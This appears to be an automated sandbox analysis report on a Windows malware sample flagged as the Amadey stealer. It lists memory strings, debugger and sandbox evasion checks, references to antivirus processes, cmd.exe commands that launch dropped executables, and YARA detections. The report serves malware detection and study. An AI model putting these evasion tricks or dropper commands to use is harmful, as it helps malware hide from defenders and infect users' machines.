Source: KKEBKJJD.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: KKEBKJJD.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Code function: 8_2_04C70C55 rdtsc 8_2_04C70C55
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C825FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C825FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C82C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00255C0B mov eax, dword ptr fs:[00000030h] 10_2_00255C0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00259972 mov eax, dword ptr fs:[00000030h] 10_2_00259972
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C7FB66C
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C7FB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe" Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe" Jump to behavior
Source: KKEBKJJDGH.exe, KKEBKJJDGH.exe, 00000008.00000002.2439124494.0000000000441000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: SProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB341 cpuid 0_2_6C7FB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C7C35A0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00225F10 LookupAccountNameA, 10_2_00225F10
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 15.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.KKEBKJJDGH.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2445574299.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2703194358.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2440931537.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.3266423975.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2394722403.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3310671212.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
